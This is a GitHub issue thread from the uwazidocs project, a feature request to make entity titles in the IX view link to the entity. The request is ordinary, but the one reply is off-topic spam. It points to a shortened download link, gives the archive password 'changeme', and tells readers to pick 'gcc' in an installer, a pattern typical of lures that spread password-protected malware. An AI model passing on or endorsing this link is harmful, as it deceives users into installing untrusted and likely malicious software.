### ISSUE TITLE
[IX] - Entity titles as link to the entity view

### ISSUE THREAD

**Issue by txau** [huridocs/uwazidocs#7148]
When working with IX sometimes users need to open the actual document or entity. Right now they need to manually locate the entity in library.  It would be handy to convert the document title to link to the document to open in a new tab.

Ie. in this case there is a validation error, I need to check the entity:

![image](https://github.com/user-attachments/assets/98a6c114-ced7-4099-999b-464c6999685c)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
